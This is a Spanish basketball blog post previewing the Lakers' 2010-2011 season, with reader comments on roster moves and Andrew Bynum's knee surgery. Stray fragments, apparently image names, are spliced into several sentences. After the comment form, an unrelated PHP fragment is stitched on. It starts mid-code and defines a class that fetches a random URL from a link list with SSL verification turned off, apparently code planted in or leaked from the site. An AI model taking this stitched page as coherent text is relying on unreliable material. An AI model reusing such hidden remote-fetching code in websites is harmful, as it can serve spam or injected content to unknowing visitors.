L. A. Lakers 2010-2011: Lakers versión 3.0

27 de September de 2010 por MagicJohnson32

Los Lakers dinásticos del three-peat, aquéllos que tiranizaron la liga entre 2000 y 2002, siguieron una constante: año a año su plantilla se fue debilitando, y sólo el dominio de Shaquille O’Neal, la eclosión definitiva de Kobe Bryant y el indeleble gen competitivo de Fisher, Horry y Fox compensaron la marcha de jugadores como Glen Rice, Horace Grant o Ron Harper.

pgkbdfJerry Buss, Mitch Kupchak y Phil Jackson, cabezas pensantes de aquel equipo y del actual, debieron de aprender la traumática lección. Lejos de acomodarse y optar por la vía conservadora tras el anillo obtenido en 2009, la dirección de la franquicia dio muestras de su ambición renovando a Lamar Odom y reclutando a Ron Artest durante el verano, y ampliando en 3 años el contrato de Kobe Bryant. La apuesta ofreció réditos con un segundo anillo, el obtenido en aquel agónico séptimo partido ante los Celtics. Pese a todo, el elevadísimo payroll que acumulaba la plantilla, sumado a las estrecheces propias de la crisis económica, hacía presagiar una política de recorte de gastos, con renovaciones a la baja y contratación de jugadores de relleno.

Pero, tal vez por la perspectiva de una nueva dinastía, tal vez por el megaproyecto que Pat Riley se ha sacado de la chistera para sus Heat, o quién sabe si por la posibilidad de que se trate de (según el propio interesado) la última temporada de Phil Jackson en los banquillos, lo cierto es que Buss no ha racaneado y los Lakers se presentan esta temporada reforzados y renovados.

El primero en llegar fue Steve Blake. Kupchak aplicó la lógica aplastante de “a un problema, una solución”, y ante la condición de agentes libres de los tres bases de la plantilla (Fisher, Farmar y Brown), ató a Blake. Se trata de un jugador del que, tras sus años como titular en los Blazers, sabemos perfectamente qué se puede esperar en ambos extremos de la cancha: por un lado es un BLAKEdefensor poco aparatoso pero sólido, y por otro es un distribuidor eficaz y capaz de convertir los espacios generados por sus compañeros en buenos porcentajes de tiro exterior. Blake parece, en definitiva, un jugador con las cualidades adecuadas para el rol de base en el modelo de Phil Jackson.

La incorporación de Blake, por 4 años y 4 millones (vía midlevel) en cada uno de ellos, restó presión a la franquicia en las negociaciones para la renovación de Fisher, pese al papel heroico  que éste ejerció -una vez más- en las pasadas Finales. La oferta a la baja condujo a una situación algo tensa y a un viaje relámpago de Fisher a Miami, donde Pat Riley le ofreció la posibilidad de sumarse a unos Beach Boys que habrían agradecido su experiencia y capacidad de resolución en las grandes citas. Finalmente el veterano base de Arkansas se mantuvo fiel a la afición que le adora y a Kobe Bryant, con quien ha compartido 11 temporadas, 5 anillos y mil batallas.

Fisher y Blake se repartirán buena parte de las tareas de base y del tiempo en cancha, con el primero probablemente partiendo de inicio y jugando los minutos decisivos. Shannon Brown, renovado tras comprobar que el mercado de agentes libres no era generoso con él, aportará su sello -energía, caos, mates- como rotación de base-escolta.

Más tarde los Lakers incorporaron a Matt Barnes, que seguía disponible tras el fracaso (o más bien ridículo) que resultaron las negociaciones para un sign and trade entre Raptors y Magic. Barnes, californiano y producto de UCLA, renunció a contratos más artestbarneslargos y lucrativos (al contrario que Raja Bell, que prefirió Utah) por la oportunidad de seguir en un equipo aspirante y además hacerlo cerca de casa, en el único equipo de la Pacific Division en el que todavía no había militado. Sus cualidades defensivas y su gran acierto desde la línea de triples convierten a Barnes en una mejora exponencial para la rotación en el puesto de 2-3, más aún dada la condición de prácticamente ex jugador de Luke Walton debido a las lesiones.

El mismo día en que ficharon a Barnes los Lakers anunciaron también la incorporación del veteranísimo pívot Theo Ratliff, jugador con una amplia trayectoria como intimidador que a sus 37 años será el encargado de aportar dureza interior desde el banquillo en los escasos minutos de los que disponga. El reciente anuncio de que Bynum se perderá las primeras semanas de competición llevará a Odom al quinteto inicial y abrirá el margen de oportunidades para Ratliff, que quedará como único suplente interior junto con el rookie Derrick Caracter, seleccionado al final de la 2ª ronda del draft pero cuya gran actuación en la Summer League le ha hecho ganar muchos puntos de cara a garantizarse un contrato. El otro rookie y última novedad en la plantilla es Devin Ebanks, alero con una planta casi idéntica a la de Trevor Ariza y con un juego lleno de kobering2010energía, de enorme potencial pero con grandes limitaciones técnicas y mucho por pulir. Ambos novatos parecen preparados para aportar esporádicamente, si es que Jackson decide echar mano de ellos.

El capítulo de bajas lo integran Farmar, Morrison, Powell y Mbenga, jugadores intrascendentes en la consecución de los recientes éxitos, con lo que cabe mirar a la plantilla 2010-2011 como una versión ampliada y mejorada de las anteriores. Kobe Bryant y Pau Gasol han disfrutado de vacaciones tras enlazar varias campañas de alrededor de 130 partidos entre NBA y selecciones nacionales, algo que especialmente en el caso de Bryant acabó por pasar factura en el tramo final de la pasada temporada. El doble MVP de las Finales asegura estar muy recuperado tanto de la rodilla, de la que se operó en julio, como del dedo, para el que sigue evitando el quirófano. Tras igualar a Magic Johnson y Kareem Abdul-Jabbar como jugadores con más pgasolanillos en la historia de la franquicia (honor que comparten con Derek Fisher), el objetivo este año es doble y más suculento si cabe: alcanzar en lo individual los seis títulos de Michael Jordan, y en lo colectivo los 17 de los Celtics. Motivación, por tanto, no faltará.

Recursos para lograrlo, tampoco. El teórico quinteto inicial será de nuevo el compuesto por Fisher, Bryant, Artest, Gasol y Bynum, el mismo de las pasadas dos temporadas. La gran mejoría la encontraremos en el banquillo, desde el que partirán hasta tres jugadores con nivel de titular como son Blake, Barnes y Odom. Al neoyorquino, campeón del Mundo en Turquía, lo veremos partir de inicio mientras Bynum termina de recuperarse de la operación de menisco.

La salud, en particular la de un Bynum que suma tres temporadas consecutivas lastrado por las lesiones, es el principal interrogante que se cierne sobre la plantilla. Pocos equipos parecen en condiciones de competir ante la combinación de talento ofensivo, intensidad defensiva y otrocentímetros que plantean los Lakers. Todos estos ingredientes, a los que se añaden la experiencia competitiva de las pasadas temporadas y la guía de un Phil Jackson que sólo sabe ganar anillos de tres en tres, mantienen a los angelinos como absolutos favoritos en la Conferencia Oeste. La franquicia ha hecho todo lo posible para que así sea, con un esfuerzo económico que muy probablemente lleve a las salidas de Vujacic y/o Walton durante la temporada con el único objetivo de liberar salarios. Eso no afectará a la competitividad de estos Lakers versión 3.0, auténtico equipo a batir de cara al anillo.

Quinteto inicial: Derek Fisher, Kobe Bryant, Ron Artest, Pau Gasol y Andrew Bynum.

Sexto hombre: Lamar Odom.

Altas: Steve Blake, Matt Barnes, Theo Ratliff, Derrick Caracter (rookie) y Devin Ebanks (rookie).

Bajas: Jordan Farmar, Adam Morrison, Josh Powell, DJ Mbenga.

Pronóstico: Campeón.

Comenta

16 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Existen muchos factores para alcanzar el éxito, pero parece que la planificación de la plantilla es la correcta. Yo desde luego no contaba a estas alturas de la película con una plantilla como ésta. Me conozco bien esos antecedentes a los que hace versión Magic en el primer párrafo.
    Creo que desde que llegó Pau al equipo no se ha podido trabajar mejor desde los despachos. Con ciertos matices y suposiciones (un cierto nivel de Odom, por ejemplo… la salud de Bynum o la cabeza de Artest) este equipo me parece uno de los más potentes y compensados que me haya tirado a la cara en esta vida.
    Uno de los fichajes que pedí hace años (y está escrito) es el de Steve Blake. Que nadie me malinterprete… sé que hay muchos bases superiores a él, igual que sé que hay muchos bases superiores a Fisher (pero que nadie me lo quite de L.A.) Son sencillamente piezas que sueldan todo lo bueno que hay después de ellos. Por cierto, puede ser apuesta perdida… pero diría que esta vez la titularidad de Fisher está más que comprometida.
    Finalmente es una lástima lo de Farmar… pero es que no ha habido manera de que haya llegado a funcionar. Por otro lado me alegra mucho que Brown se quede…

    De Barnes, ya sabéis todos que no es santo de mi devoción… pero creo que ha llegado a un lugar y un rol ideal para él. También me parece un buen fichaje… y la defensa del perímetro da miedito del gordo. Artest es el puto amo.
    A Walton le doy por perdido. A Vujacic, ójala de repente despierte… pero mucho tiene que despertar para compensar todo lo malo que nos ha brindado este tiempo.

    Y lo dicho, sólo esperar a un Odom medio normal y un Bynum sano (además de que nuestros capos estén bien y descansados, claro) y a este equipo será muy difícil tumbarlo.

    LAKERS GO!!!

      Citar

  2. Viva_Dirk dice:
    #2

    No tengo nada que añadir al análisis, estoy deacuerdo en todo y mi única preocupación es la salud de Bynum.

    Vamos vamoooooooooooosssssssssss!!!!!!!!!!!!!!!

      Citar

  3. Love Denise dice:
    #3

    Muy Buen analisis, nada que objetar.
    Me alegra saber que empeceis a valorar lo bueno que es Barnes y lo pufo que es Walton, y no pongais las lesiones como excusas, que cuando estuvo sano ya nos “”deleitó”” con su calidad.
    Si los Heat no se hubiesen reforzado de esta manera, pienso que el campeonato ya tendría un dueño claro vestido de purpura y oro (salvo lesiones), aún así, pienso que LA sigue por delante de los Heat ya que es un equipo hecho, habrá que estar atento a cómo es capaz Riley de manejar las piezas en sus Heat. Además, la presion en los Heat será mayor que en LA.

    A mi parecer, esta será la rotación tipo de LA, la que emplearán en partidos jugados hasta el final, sin contar aquellos partidos cuyo ultimo cuarto serán de la basura (que con el potencial del equipo, tendrán bastantes este año).
    Bases: Fisher y Blake, 24 minutos para cada uno
    Escoltas – Aleros: Bryant (36) , Brown (12), Artest (30), Barnes (18…y subiendo)
    Pivots: Gasol (36), Bynum (28), Ratliff (8) y Odom (24)

    Los rookies, La Maquina de fallar Vujacic y paquetewalton: minutos de la basura y cuando haya lesiones

      Citar

  4. MagicJohnson32 dice:
    #4

    Sí, más o menos la rotación será ésa, aunque creo que Vujacic partirá igualado con Brown en la rotación, y los minutos se decantarán hacia uno u otro en función del rendimiento (lo normal es que caigan del lado de Shannon, claro, salvo que Sasha despierte del estado de hibernación en el que permanece desde que firmó su gran contrato). También creo que Ratliff tendrá partidos de 0 minutos una vez Bynum esté a tope.

      Citar

  5. TheDeerHunter dice:
    #5

    @LDenise… estando sano, a Barnes le hubiera gustado hacer una campaña como la del 2006-07 de Walton. Y aquí sólo hablo de lo registrado en las tablas…
    De momento ójala los amarillos le cojamos tanto cariño y respeto a Barnes como se lo hemos cogido a Walton. Será por algo.

      Citar

  6. Jabho dice:
    #6

    Es un equipazo sin duda y el máximo favorito para ganar el anillo.

    A mi me genera muchas dudas Bynum y si el vuelva a no estar bien en Play Offs lo pasaran mal, porque Odom-Pau es muy poco y al bueno de Ratliff no le puedes pedir mucho.

    Es mejor equipo que el año pasado, pero los Celtics y los Heat también son mejores que el año pasado. Sin una buena versión de Bynum en PO creo que no ganaran…

      Citar

  7. Love Denise dice:
    #7

    No hagas demagogia Deerhunter, aquellos lakers de la 2006-2007 eran una autentica banda, cualquier jugador normalito hacía buenos numeros porque el equipo apestaba, hasta tal punto de que Walton era el 3er mejor jugador!!!!!, normal, jugando al lado de los infames Kwame Brown, Maurice Evans, radmanovic, Vujacic, Smush Parker!!!!!, Shammond Williams!!!!, Turiaf, Brian Cook!!!!.
    Vamos, pones a Barnes con éstos o a cualquier jugador similar y te mete 15 puntos p. partido. minimo.
    Hablando vulgar, aquel equipo era una mier….

      Citar

  8. TheDeerHunter dice:
    #8

    A mí me parece que la demagogia no viene por mi parte… porque según como lo cuentas habrá quien no llegue a saber que aquel equipo alcanzó playoffs y que habían muchos equipos todavía más mierden que aquel. O que el hecho de que hubiera, por decir, un “Shammond Williams” en el equipo no benefician los altísimos porcentajes de Walton (que ya los querría Barnes para él ) o el número de asistencias y de rebotes.

    Si nos ponemos así, el haber hecho Barnes su mejor temporada al lado de Nash demuestra bastante poco. Me hubiera gustado vérsela hacer al lado de Smush Parker.

      Citar

  9. MagicJohnson32 dice:
    #9

    Estoy con Deer en este tema. A Walton lo han destrozado las lesiones, pero cuando ha estado bien físicamente ha sido un jugador que ha cumplido.

    En cuanto a las dudas sobre Bynum, es lógico dudar de si estará en plenas condiciones de cara al momento crítico de la temporada, pero antes de nada hay que recordar que los Lakers llevan 3 Finales y 2 anillos seguidos y nunca han dispuesto de un Bynum ni siquiera al 50%. Y sólo con las mejoras que suponen Blake y Barnes (recuerdo que vienen a suplir a jugadores que no han rendido nada) la plantilla ya da un salto importante.

      Citar

  10. Txusma dice:
    #10

    Hablar a toro pasado es muy fácil pero vista la fragilidad de Bynum parece exagerado el contrato que dsifruta, no? Y por cierto, eso que dicen que se va a perder partidos en la primera parte de la temporada pq no se operó a tiempo al ir al Mundial de Sudáfrica es cierto?

      Citar

  11. MagicJohnson32 dice:
    #11

    Es que los contratos dependen mucho más del rendimiento de un jugador cuando está sano que su fragilidad ante las lesiones, y viendo cómo está el panorama de centers, el precio de Bynum es ése.

    Sobre el tema de la lesión y la operación, es un poco más complejo que eso (y lleva un rato explicar toda la historia, jeje):

    Bynum planeó su operación para el 18 de julio, un mes después de acabar las Finales. Phil Jackson y Kupchak dieron su ok tanto a la fecha como al viaje de Bynum al Mundial, ya que a Jackson le pareció bien que el jugador se relajase tras el tremendo sobresfuerzo que tuvo que hacer durante los Playoffs jugando lesionado.

    Luego resultó que el cirujano que tenía que operar no estaba disponible hasta el 28 de julio, lo cual retrasó más la operación.

    La cosa es que Bynum no retrasó la operación para poder ir al Mundial (de hecho, antes del viaje a Sudáfrica a Bynum se le drenó la rodilla), sino por disponer de un periodo lógico de descanso entre el final de la temporada y el inicio de la rehabilitación (el propio Kobe también se operó tras el Mundial), pero siempre con tiempo suficiente para recuperarse antes de empezar la regular season.

    ¿Cuál es el problema entonces? Fácil: la operación, que se suponía que iba a consistir en quitar la zona del cartílago dañada, tuvo que ser otra debido precisamente a todo lo que la rodilla había soportado durante los Playoffs. La intervención fue mayor, y por tanto, con un mayor tiempo de recuperación.

    Es decir, que Bynum estableció una fecha para la operación porque el calendario de rehabilitación previsto en ese momento no le iba a obligar a perderse partidos.

    Por supuesto, es mucho más fácil decir que Bynum se perderá un mes de competición por haber ido al Mundial.

      Citar

  12. Txusma dice:
    #12

    Ya me parecía mi raro el asunto pq Jackson es de los que ata bien corto a sus jugadores

      Citar

  13. MagicJohnson32 dice:
    #13

    Una puntualización sobre este tema… He estado viendo la cobertura que NBA TV ha hecho de la primera jornada de training camp de los Lakers y le han preguntado a Kupchak sobre ello. Ha dicho que se ha creado mucha confusión y que casi todo lo que se ha dicho no es correcto. Básicamente, en el momento de hacer la operación se decidió optar por una intervención mucho más beneficiosa para el jugador en todos los sentidos, excepto que las 6-8 semanas de recuperación se convertirían en 10-12. Ha explicado que no es nada negativo, que no tiene nada que ver con que Bynum tenga problemas para recuperarse de las lesiones y, por supuesto, que no ha sido una irresponsabilidad por parte del jugador. Simplemente se ha optado por lo que será mejor a medio y largo plazo.

    Ojalá se note y podamos ver a Bynum un buen tiempo sin lesiones.

      Citar

  14. Chris dice:
    #14

    Fantastico analisis.
    Apuntar dos cositas:
    La primera con respecto a la cirugía de Bynum, la intervención que se a realizado es la más beneficiosa para la rodilla del jugador a medio-largo plazo y también para la prevención de nuevas lesiones.
    Es absurdo intentar acortar el periodo de recuperación ya que esto puede perpetuar la inflamación de la rodilla haciendo que el jugador recaiga durante la temporada o que se estropee la rodilla sana por sobrecarga. Los Lakers pueden pasar sin problemas el comienzo de la RS sin Bynum, lo que realmente sería terrible es que la carrera del jugador se viese de nuevo truncada por otra lesión por no hacer bien las cosas.
    La segunda es aplaudir la labor de Kupchak en las últimas tres temporadas será el nuevo GM del año espero que sí porque eso querrá decir que los Lakers dominan.

      Citar

  15. portu dice:
    #15

    Bueno, no sé como se hará una cirugía para prevenir lesiones…
    El tema Bynum es muy complicado, es muy alto y tiene bastante peso, salta bastante con lo cual castiga mucho rodillas y tobillos, lleva ya varias operaciones, incluso tiene una forma de andar algo peculiar… no sé, no me gustaría q se perdiera este pedazo de center por nuevas lesiones, pero su historial me hace ser pesimista a medio-largo plazo.

      Citar

  16. MagicJohnson32 dice:
    #16

    Portu, evidentemente tú dispones de muchos más conocimientos médicos y yo sólo te puedo contar lo que he leído y escuchado… Mira, te pongo la cita textual del LA Times donde se explica:

    “Atcheck’s original plan to cut away a piece of torn cartilage in Bynum’s right knee soon deviated to sewing up the tear completely”

    Traduzco: el plan original de Atcheck (el médico) de retirar el trozo de cartílago dañado en la rodilla derecha de Bynum varió a coser completamente el desgarro.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>